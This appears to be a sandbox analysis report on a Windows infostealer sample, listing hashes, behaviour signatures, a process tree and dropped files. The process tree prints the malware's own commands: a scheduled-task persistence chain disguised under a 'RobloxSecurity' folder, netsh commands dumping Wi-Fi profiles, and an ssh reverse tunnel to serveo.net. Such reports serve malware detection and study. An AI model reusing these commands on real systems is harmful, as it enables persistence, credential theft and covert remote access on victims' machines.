Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 19:41

General

  • Target

    479d30cd484920e686388641718edc53.exe

  • Size

    120KB

  • MD5

    479d30cd484920e686388641718edc53

  • SHA1

    c7040a1893168c204c759280d9671b0b58890c8c

  • SHA256

    e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601

  • SHA512

    e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d

  • SSDEEP

    1536:2Wzd3+6aUp+3aTvjgFnbF/nt6z9b1Caom02vrDxcHtcV/erWEUzny94BgJad:z3av3aTvjv9b1Ch30rDxcHtcV/SquI

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\479d30cd484920e686388641718edc53.exe
    "C:\Users\Admin\AppData\Local\Temp\479d30cd484920e686388641718edc53.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4872
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "479d30cd484920e686388641718edc53" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\479d30cd484920e686388641718edc53.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3056
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:4392
        • C:\Windows\system32\timeout.exe
          timeout /t 3
          3⤵
          • Delays execution with timeout.exe
          PID:792
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "479d30cd484920e686388641718edc53" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:4008
        • C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe
          "C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:728
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1988
            • C:\Windows\system32\chcp.com
              chcp 65001
              5⤵
                PID:4572
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                5⤵
                  PID:744
                • C:\Windows\system32\findstr.exe
                  findstr /R /C:"[ ]:[ ]"
                  5⤵
                    PID:3984
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3208
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    5⤵
                      PID:3996
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      5⤵
                        PID:3200
                      • C:\Windows\system32\findstr.exe
                        findstr "SSID BSSID Signal"
                        5⤵
                          PID:3484
                      • C:\Windows\System32\OpenSSH\ssh.exe
                        "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:5845 serveo.net
                        4⤵
                          PID:3896
                  • C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe
                    C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4220
                  • C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe
                    C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:3996

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\479d30cd484920e686388641718edc53.exe.log

                    Filesize

                    847B

                    MD5

                    3308a84a40841fab7dfec198b3c31af7

                    SHA1

                    4e7ab6336c0538be5dd7da529c0265b3b6523083

                    SHA256

                    169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e

                    SHA512

                    97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

                  • C:\Users\Admin\AppData\Local\RobloxSecurity\479d30cd484920e686388641718edc53.exe

                    Filesize

                    120KB

                    MD5

                    479d30cd484920e686388641718edc53

                    SHA1

                    c7040a1893168c204c759280d9671b0b58890c8c

                    SHA256

                    e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601

                    SHA512

                    e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d

                  • C:\Users\Admin\AppData\Local\lbdd1brp2p\p.dat

                    Filesize

                    4B

                    MD5

                    f41ff84e7cbd129397c11f8c5d20c0f4

                    SHA1

                    2e7ace4ae19fe5ab037be4b00c4af208689a5d64

                    SHA256

                    e254ad19d679ecdad2bb3fe08f1b14ab6ff988679c86f8b3e9ed2b7275dbd522

                    SHA512

                    53fc60dbde23723eb674e3c5f814259f7a3a16507393d5f4192dd014e8e890d452a7a3f56f4b4074719e6c4585aa6a09e89395e33e2d3ae13563dfe63a1e0510

                  • memory/728-11-0x00007FFB15700000-0x00007FFB161C1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/728-15-0x00007FFB15700000-0x00007FFB161C1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4872-0-0x00007FFB16103000-0x00007FFB16105000-memory.dmp

                    Filesize

                    8KB

                  • memory/4872-1-0x000001E5DD9A0000-0x000001E5DD9C4000-memory.dmp

                    Filesize

                    144KB

                  • memory/4872-4-0x00007FFB16100000-0x00007FFB16BC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4872-6-0x00007FFB16100000-0x00007FFB16BC1000-memory.dmp

                    Filesize

                    10.8MB